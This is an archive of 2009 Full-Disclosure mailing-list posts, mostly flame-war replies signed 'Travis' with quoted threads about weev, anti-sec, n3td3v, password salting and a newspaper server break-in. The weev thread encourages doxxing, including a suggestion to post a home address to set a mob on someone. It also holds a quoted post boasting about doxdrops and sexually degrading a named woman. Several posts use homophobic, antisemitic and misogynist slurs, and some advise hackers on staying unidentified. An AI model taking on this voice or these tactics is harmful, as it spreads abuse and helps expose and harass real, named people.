sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd
Mapping weev-IRL has no real impact, as he has either an entirely different identity or a DBA, if this was a fictional account on weev's part it would be certainly easy, effective, and feasible for him to change a single letter in his name. For the next part, you might want to grab some calming tea or something... If you've achieved anything it's angering his online persona, these typically only become a bit more malicious and difficult to catch. You've succeeded only in creating an even larger 'weev.' Try posting a home address next time. For bonus points engineer some sort of scheme where the hive becomes enraged and R4L's him. It's been done before, and will be done again by those with real 'talent.' Given that weev has demonstrated competency in all the above I think it prudent that you not associate this disclosure to any of your other online identities. (Brag on IRC already? Who did you work with? You seem to be somewhat close to weev, enough to have a personal vendetta against him, do you know that everyone you've talked with actually hates the guy enough not to drop your pseudonym?) -Travis On Wed, Sep 16, 2009 at 8:52 PM, zewbiec...@gmail.com zewbiec...@gmail.com wrote: what does google earth have to do with any of this? On 9/16/09, GOBBLES gobbles1...@safe-mail.net wrote: What do you mean Sherrod *was* a fed? Obviously the point wasn't to ruin. The point was to salt the earth by filling google with your real name. I can now officially say the (Google) Earth has been salted for you. You'll never be able to live a real life again. You'll always be hiding in the shadows for the rest of your life now. In may not hit you now, but eventually you'll feeling suffering and despair. I'm the one who helped in the process of clipping your wings to keep your grounded. To leave you in the world where mediocrity will never come. You are a monster for what you did to Kathy... She's a great UX designer and a beautiful woman... Sincerely, Tim O'Reilly Btw all dogs go to heaven was awesome you fucking faggot Original Message From: Andrew A glutt...@gmail.com To: GOBBLES gobbles1...@safe-mail.net Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd Date: Tue, 15 Sep 2009 23:52:42 -0500 Okay. You've been in contact with Hep? She's handed over her logs? Oh man, the FBI now has hundreds of megs of me scrolling ansi on IRC, telling her she's a sickly withered ghoul, calling her fat, and making fun of her Springeresque living situation of having 3 different kids by 3 different dads (seriously hep is basically the hip web2.0 version of used up trailer trash whore). Oclet's handed over his logs? Wow, the FBI now has records of all the times I've told him to stop doing cocaine and drinking and clean up his act. Sherrod DeGrippo was indeed a fed. If she's turned against me, the FBI now has all the records of me posting the information of people with autism to Encyclopedia Dramatica! I'm goin' down! Tehdely, the gay San Francisco Jew who works for blogging house Six Apart will be able to tell a jury that I, in the haze of a 5-balloon dose of nitrous oxide, did a sieg heil salute and shouted heil hitler while giggling hysterically. I, clearly, will be screwed by this revelation of SECRET KNOWLEDGE in the grand jury proceedings. And actually, you can make your living off of advertising and selling t-shirts. I made high sfigs off of direct marketing alone for several years. You antis are pathetic. You think you got one up on me by pasting some fuckin info I put in my fuckin LIVEJOURNAL? Is this what hackin is these days? Are you gonna start syndicating emo rants from 14 year old girls into f-d posts with ascii banners at the top, acting like you owned people? See, for a doxdrop to be proper, you have to do info that is not already public, and you have to tie it together in a way that reveals something about their lives that they did not want people to know. For example, when some clever soul revealed that Rob Levin of freenode didn't actually live in a trailer, had all sorts of welfare and was still using people's donations to supplement his income, that was a pretty sweet doxdrop: http://antisec.wordpress.com/2006/06/27/eyeballing-rob-levin/ Or when somebody pieced together Kathy Sierra's sordid history of dick sucking, that was pretty fuckin' awesome: http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2007-03/msg00507.html You, sir, are a fucking amateur. You haven't uncovered anything new (the most well funded law enforcement organization in the world had to do that for you in their organized campaign, and you copied it from my livejournal), and it is certainly not anything I tried to hide, as I put it in my fucking blog. No secrets uncovered, no dark past revealed, just shit you copied from my livejournal to full-disclosure. Doxdrop is not copy and paste. You
Re: [Full-disclosure] Time to stop this non-sense
That's cool, your mom still superfluous. -Travis On Fri, Aug 28, 2009 at 12:50 PM, Gavinnetmatt...@gmail.com wrote: 2009/8/28 T Biehn tbi...@gmail.com: Dear Gavin: My internet pseudonym is List. I suggest that you stop spreading libel about me on the internet or I will be forced to hire internet police and ruin your life. FOREVER. -Travis Not before I pwn your Grandma's PC and divert your weekly allowance. ;) -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sexless schadenfreude: the potential extremist Michael Crook.
I'm sure the man already has his big eye on Michael, especially since his last name is Crook, these are facts they wouldn't miss. On Tue, Aug 25, 2009 at 10:49 AM, valdis.kletni...@vt.edu wrote: On Tue, 25 Aug 2009 10:07:07 -, Michael Crook said: ~ John Doe / n3td3v (http://www.twitter.com/n3td3v) P.S. This is an anonymous, Hint: Look up big words like anonymous in the dictionary, make sure you're using them correctly. It adds that extra luster of competence to your postings. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Questions for the iProphet
Do what thou wilt shall be the whole of the law On Fri, Aug 21, 2009 at 11:16 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote: --On Friday, August 21, 2009 04:03:40 -0500 netdev.doc...@hushmail.com wrote: Hey weev. Now that the FBI and everything are all out to get you, I was wondering what life on the lamb was like. Wouldn't life on the lamb be sheepophilia? Wouldn't it be better to have life on the sheep, if you're so inclined? Or did you mean life on the lam? -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Slander of security researcher n3td3v
Very exclusive membership of notable fallators. Avoid option 5. -Travis On Tue, Aug 11, 2009 at 5:00 PM, anti...@hushmail.com wrote: Tell your faggot friend he can't be in our club. On Tue, 11 Aug 2009 16:24:09 -0400 someone lawyer some...@lawyer.com wrote: List, My client is genuine, he has never been part of anti-sec. some...@lawyer.com -- Be Yourself @ mail.com! Choose From 200+ Email Addresses Get a Free Account at www.mail.com! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pgp http://pastebin.com/f6fd606da pgp ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Salted passwords
Richard,
The approach I outline in my post is the correct one, that is, making
it computationally expensive to crack. I'm not trying to protect
passwords, think anonymizing account numbers and the like.. That is,
the possible combinations are a set that is unacceptably small.
Without an expensive compute step it's trivial to brute force given a
static salt location...
(excuse my use of shitty pseudocode, assume homogeneous length 10)
Typically the test is:
if storedHash = hashFcn(userPassword storedSalt) //9,999,999,999 tests
if you randomly store the storedSalt ANYWHERE within userPassword, it becomes
for (int i=0; ilen(userPassword); i++) {
String toTest = substring(userPassword,0,i) storedSalt
substring(userPassword,i)
if storedHash = hashFcn(toTest) {
return true;
}
}
return false; //99,999,999,990 tests
and like hashFcn could be
for (int i=0;iexpensive;i++) {
x = pgp(x);
x = md5(x);
}
return x;
It'd be heavy if pgp were using 4096 bitsize keys. Tweak 'expensive'
to match average acceptable test time. (5 seconds to run 10 tests.)
The set size increases, and brute force attempts become more difficult
(as for each brute force test in the set you must test 'strlength'
times). That is, in a set of homogeneous length strings the hash set
is set size times string length.
I believe this is a rather typical approach. I'm interested to see if
someone else has any other ideas/accepted methods for effectively
increasing the hash set size without increasing the value set size.
It's more so that I'm trawling the net for like minded individuals
rather than soliciting actual advice. Other methods are fairly
obvious.
Using two salts with random locations, etc.
I'm afraid it follows, though, that I reach a point where it's too
expensive, and thus login to a service will suffer an unacceptable
delay, this limitation precludes me from preventing against cracking
by the 10 million dollar computer and certainly such a scheme will
not be 'future proof.'
-Travis
On Sun, Aug 9, 2009 at 11:56 PM, Richard
Golodnerrgolod...@infratection.com wrote:
**REDACTED**
explain please
**REDACTED**
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hindustan Times epaper Server Hacked
While your publications are slightly pretentious (who am I to talk?) I applaud your idealism in an age of rampant cynicism. Don't log into any US Government systems looking to liberate secret UFO docs tho, that gets you extradited. A small suggestion, do not use a consistent pseudonym, post completely anonymously. It's difficult to keep the ego from making mistakes. -Travis On Sun, Aug 9, 2009 at 1:56 AM, Skywhitemat...@gmail.com wrote: Hindustan Times epaper Server Hacked http://sky.net.in/hindustan-times-epaper-server-hacked/ Hindustan Times (HT) is India’s leading newspaper, published since 1924 with roots in the independence movement. In 2008, the newspaper reported that with a (circulation of over 1.14 million) ranking them as the third largest circulatory daily English Newspaper in India. The Mumbai edition was launched on 14 July 2005. HT has a readership of (6.6 million) ranking them as the second most widely read English Newspaper after Times of India. (Source: Wikipedia article on Hindustan Times) - http://en.wikipedia.org/wiki/Hindustan_Times HindustanTimes + Hindustan epaper Server Hacked http://lh4.ggpht.com/_gbWPSul_tCM/Sn5UNhLLVYI/ASM/JY9bc67HV14/s800/hindustan_times_hacked.jpg Why was Hindustan Times (HT) epaper Server Hacked ? Many people think that Hindustan Times (HT) (English Edition) + Hindustan (Hindi Edition) is available on the internet free of cost, HT Media has made it compulsory to register on their website in order to read the daily online edition of their published newspapers, on completion of registration HT Media provides you instant access to read daily edition, the CATCH is – you can only read the daily edition + past seven days editions (from the current date) as a free user, whileas if you wanna read any edition beyond seven days, you will have to pay a huge (rip off) amount to HT Media (in the name of digital archive subscription) Registration Information Collected by HindustanTimes http://lh6.ggpht.com/_gbWPSul_tCM/Sn5WIrsZxcI/ASs/Lc6NaQzxEfk/s800/HT_registration.jpg Free HindustanTimes Editions http://lh6.ggpht.com/_gbWPSul_tCM/Sn5UN35Yx5I/ASU/6THfLaMu00M/s800/HT_free_editions.jpg Restricted Access to HindustanTimes epaper Archives http://lh4.ggpht.com/_gbWPSul_tCM/Sn5UN5umsJI/ASY/5_SfNzOEm7w/s800/HT_newspaper_subscribe.jpg Archive Subscription Charges for HindustanTimes is a total Rip Off http://lh4.ggpht.com/_gbWPSul_tCM/Sn5ViIwx2aI/ASo/6TMgKDuc6Vg/s800/HT_archive_charges.jpg As a hacker, i think its not fair (for anyone) to loot common people and sell (publicly gained) information in such a way, so i decided to peek inside the server and find some bugs / architectural flaws which would allow me to access past newspaper (Images / PDF) editions for free Within a couple of hours, i managed to find some bugs / architectural flaws ( vulnerabilities) which gave out free access to the past (Images / PDF) newspaper editions Calvin and Hobbes publishing error I used to search the newspaper (HT hard copy) every morning for technology related news (hoping any Indian journalist must have written some piece) that went on for like weeks and then i started reading Calvin and Hobbes (the comic strip) every day published in HT Cafe On 2nd / 4th / 9th June, Hindustan Times (HT) published the same Calvin and Hobbes strip, how should i react against this publishing error by Hindustan Times, as a fan of Calvin and Hobbes, i expect new comic strip every day Checkout the exact same Calvin and Hobbes strip published thrice on various days in the single month of June (2009) 2nd June http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/02/538/02_06_2009_538_013.jpg 9th June http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/09/538/09_06_2009_538_002.jpg 4th June http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/04/538/04_06_2009_538_006.jpg Informing the privileged authorities On 10th July 2009, i informed the editor and other top most authorities @ HindustanTimes via email regarding the serious bugs / flaws ( vulnerabilities) on their ePaper Server which can be exploited to compromise data and cause financial losses for HT Media My email to HindustanTimes http://lh5.ggpht.com/_gbWPSul_tCM/Sn5WJt3UKGI/AS0/KOnhjTtBNnk/s800/my_email_hindustan_times.jpg Rashmi Chugh's reply to me http://lh4.ggpht.com/_gbWPSul_tCM/Sn5W9mSD0pI/ATI/O5hazb5IIY4/s800/rashmi_livemint_reply.jpg Although i received a reply from Rashmi Chugh (Business Head and Publisher, LIVEMINT) within 3 minutes, i waited for 24 hours to receive other recipients reply (as i wanted to know what they thought about the issue) but sadly no one replied back except Rashmi Chugh, so i sent her a reply the other day My reply to Rashmi Chugh, LIVEMINT
Re: [Full-disclosure] Ureleet is the Anti-Sec
n3td3v, ureleet, and anti-sec are actually all Hitler, posting after being recently unfrozen from cryogenic sleep. He is using this as part of his black magic scheme to bring back nazi occultism and rule the world once again. Careful review of all posts shows the superstructure of a subconscious mind-virus, waiting for a trigger event deep in the recesses of our collective minds. When you want to go to it Relax don't do it When you want to come -Travis On Sun, Aug 9, 2009 at 12:20 AM, anti...@hushmail.com wrote: n3td3v is our exploit coder. pheer infidelz. On Sat, 08 Aug 2009 19:31:26 -0400 someone lawyer some...@lawyer.com wrote: List, Ureleet is the Anti-Sec he been trying to slander n3td3v (legitimate security researcher) the whole time. some...@lawyer.com -- Be Yourself @ mail.com! Choose From 200+ Email Addresses Get a Free Account at www.mail.com! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Salted passwords
Valdis, I don't have control over the set. Sorry I wasn't more explicit about this. Although, it should have been obvious that the solution needed to satisfy the conditions: Data to one way hash. The set has 9,999,999,999 members. Thanks for your input sweetie! -Travis On Mon, Aug 10, 2009 at 4:26 PM, valdis.kletni...@vt.edu wrote: On Sun, 09 Aug 2009 20:14:57 EDT, T Biehn said: Soliciting random suggestions. Lets say I have data to one-way-hash. The set has 9,999,999,999 members. Actually, if you're using a 10-digit decimal field, you probably have 10**10 possible members - all-zeros counts too (unless there's *other* reasons zero isn't a legal ID). It's those little off-by-one errors that tend to get you. ;) It's relatively easy to brute force this, or create precomp tables. That's because you only have 10M billion members to brute force against. So you add a salt to each. A better idea cryptographically would be to fix the 10**10 member limit, so that the set *could* have a much higher possible number of members. Even staying at 10 characters, but allowing [A-Za-z0-9] (62 possible chars) raises your space to 62**10 or about 8.3*10**17 (or almost 10M times the difficuly). That's why most symmetric crypto algorithms use at least 64-bit or even larger keys, and even larger for RSA and similar public-key systems. -- pgp http://pastebin.com/f6fd606da pgp ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Salted passwords
Thank you for the thoughtful analysis Raid. The hash and salt are both known to the attacker :) It looks like I'm going to have to settle with confounding efforts by the man via increased hash computation cost. -Travis On Mon, Aug 10, 2009 at 6:53 PM, r...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Travis, On Mon, 10 Aug 2009 22:50:32 +0200 T Biehn tbi...@gmail.com wrote: I don't have control over the set. Sorry I wasn't more explicit about this. Although, it should have been obvious that the solution needed to satisfy the conditions: Data to one way hash. The set has 9,999,999,999 members. if these are the only two conditions, I wonder why a static salt does not satisfy your requirements? If the salt is not publicly known, the procedure is secure in respect to the hash-function in use... So, suppose the third condition is the salt may be publicly known. Suppose, we have plaintext (alphabet E, length of alphabet s = |E|) with fixed length, say 'c' chars. So if you insert the salt at a random position, there are c+1 possibilities for the position of the salt. So the bruteforce attacker has to run c more tests than having the salt in a fixed position. Comparing the two procedures under a theoretically view, there isnt a significant difference in terms of runtime complexity: If the salt is not publicly known and at a fixed position, complexity (means: number of possible plaintexts) is at O(s**c). Your method only rises complexity by a constant factor: It's at O( (c+1) * s**c). Theoretically this is negligible: If it takes me 2 hours to bruteforce procedure 1 (fixed position), why bother about 20 hours computing for procedure 2? Practically it depends on your overall requirements. Besides, your procedure lowers the latch for DoS... at least slightly (same argument as above). So far, my two cents... raid -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkqApOoACgkQ/WWNsggjSSFjgAP/Wr/yus6Zf8e/nkegfMw4AeRS5Xz4 GP91CUbwEEgy0qMsL7HvrAc7oo7dt5PpEZIePVkBF8ea9WeW9RlX1YK7ZlkkIP6ZLKx2 XgT515eGNeTMbcKSmAOWlIkL4JtKRBxh7YLb0QP0yi3pCY7MGl4ZAtcGN25vx3Nkkq18 WMoO6VQ= =UN3m -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pgp http://pastebin.com/f6fd606da pgp ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Salted passwords
Soliciting random suggestions. Lets say I have data to one-way-hash. The set has 9,999,999,999 members. It's relatively easy to brute force this, or create precomp tables. So you add a salt to each. Still easy to brute force. If you were to create it in such a way that the hash could exist anywhere in the set member, does this increase the cost of computation enough? That is, consider a member 'abcdefg' with salt 329938255. When authenticating against the server, it must permute over all possible combinations of the salt and the set member in order to determine the validity of the password. If anyone has a better approach, or would like to approach me off list, or knows of a list more suited to these queries please feel free to redirect me :) -Travis ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] IACR
Anyone been to this? http://www.iacr.org/conferences/crypto2009/program.html Worth it? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IACR
Sorry to spam... http://www.iacr.org/cryptodb/data/author.php?authorkey=207 So excited to find non-pay papers... Everything on IEEE and ACM reqs you shell out cash. On Fri, Jul 31, 2009 at 10:20 AM, T Biehntbi...@gmail.com wrote: Anyone been to this? http://www.iacr.org/conferences/crypto2009/program.html Worth it? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fredrick Diggle Security - Shameless promotion of services to Matasano
Travis wonders when Fredrick Diggle has time for his highly trained and effective security enterprises knowing that he spends most of his time grooming monkeys and feeding giraffes, which is very difficult to do when the monkeys decide to start an inter-species war because the giraffes are blocking their sunlight. Unless, of course, you've trained some of the brighter monkeys on how to use metasploit... Looking for investors? On Mon, Jul 27, 2009 at 3:23 PM, Fredrick Digglefdig...@gmail.com wrote: Fredrick Diggle Security has been made aware through its extensive network of underground connections and informants that the security firm Matasano was recently viciously attacked by a group of hackers. Fredrick Diggle would like to personally offer his (and his cronies) services in responding to this incident. Fredrick Diggle Security recommends that Matasano contract professional incident responders (namely Fredrick Diggle et al) to perform forensic analysis of the compromised system(s). Only then can Matasano be assured that all possible steps have been taken to detect and remove any rootkit(s) that may have been placed on this/these system(s). Fredrick Diggle would also like to offer his services in performing a review of Matasano's network architecture. This will help to ensure that Matasano will be in the best possible position to prevent and/or manage future incidents. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CodeIgniter Global XSS Filtering Bypass Vulnerability
This is a joke, right? -Travis On Mon, Jul 27, 2009 at 11:53 AM, YGN Ethical Hacker Group (http://yehg.net)li...@yehg.net wrote: CodeIgniter Global XSS Filtering Bypass Vulnerability Discovered by: Aung Khant, YGN Ethical Hacker Group, Myanmar http://yehg.net/ ~ believe in full disclosure Product : CodeIgniter http://www.codeigniter.com Product Description : Open-source PHP Framework Pen-Tested Version : 1.5.2 Vulnerability : User-Agent injection Risk : Medium Threat : XSS, Log File Tampering Advisory URL: http://yehg.net/lab/pr0js/view.php/CodeIgniter%20Global%20XSS%20Filtering%20Bypass%20Vulnerability.pdf Description: $CI-input-user_agent() fails to check the validity of user-agent type. It simply extracts from $_SERVER array without checking whether it is bad string injection or not. In this case, we can spoof user agent string of our browser with our arbitrary commands that can bypass stronger CodeIgniter Security class even if $config['global_xss_filtering'] = TRUE;. Thus we can execute XSS on the fly. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] anti-sec: OpenSSH = 5.2 zero day exploit code - 48 hours until it is publicly released!
1) Register 'Anti-Sec *' with Free Mail Provider 2) Claims to Full Disclosure 3) 4) PROFIT. On Mon, Jul 20, 2009 at 10:16 AM, BlackHawkhawkgot...@gmail.com wrote: wasn't anti-sec the one fighting against guys who share exploits with the world so script kiddies use them? lol, now those guys will kill them selfs! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The Anti-Sec Movement - Clarrifying what it means. Our Targets Remain HackForums.net and Milw0rm.com
Is there any nudity in this film? -Travis On Fri, Jul 17, 2009 at 3:24 AM, Valdis' Mustachesecuritas.must...@gmail.com wrote: To whom it may concern: I am frankly at a loss as to why Mr. Wallace has decided to hitch his pasty and pockmarked Scottish girth to the recent resurgence of the AntiSec movement. One can only conclude that it is an attempt to regain a presence on this esteemed list, which as all longtime subscribers know can only end in tears. I strongly advise all members to take immediate action to ignore this rather pitiful attempt to ride the coattails of bona fide Internet saboteurs and killfille with extreme prejudice. If possible, individuals in or about the greater London metropolitan area should take steps to recover Mr. Cartwright from his unfortunate incarceration so that he might bring forces to bear on the problem and proactively ban applicable Internet Protocol addresses and other suspected sock puppets before this list descends into the typical simian feces-smearing and autofellatio that have historically followed Mr. Wallace's e-ejaculations on this forum. I am not amused. Your Humble Servant, Il-Mustache tal Valdis ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Go away Anti-Sec/Security Justice
dox pull got doxed? ironic. On Fri, Jul 17, 2009 at 1:16 PM, anti-anti...@hushmail.com wrote: LMH, can you and your Security Justice friends please get laid and leave the rest of us alone? This Anti-Sec rebranding is more boredom. Oh- we know where you work, and who some of you really are. I wonder how they'd feel about this stupidity? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v is posting as ant-sec
I was about to tarball my directory of XSS 0days for them... Thanks Ureleet! /typical fd post -Travis On Thu, Jul 16, 2009 at 8:54 AM, Ureleeturel...@gmail.com wrote: careful. n3td3v has found his way back onto the list. he is now posting as ant-sec. he is hacking and spreading disinformation on full-d. careful who you talk 2, he has many names. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
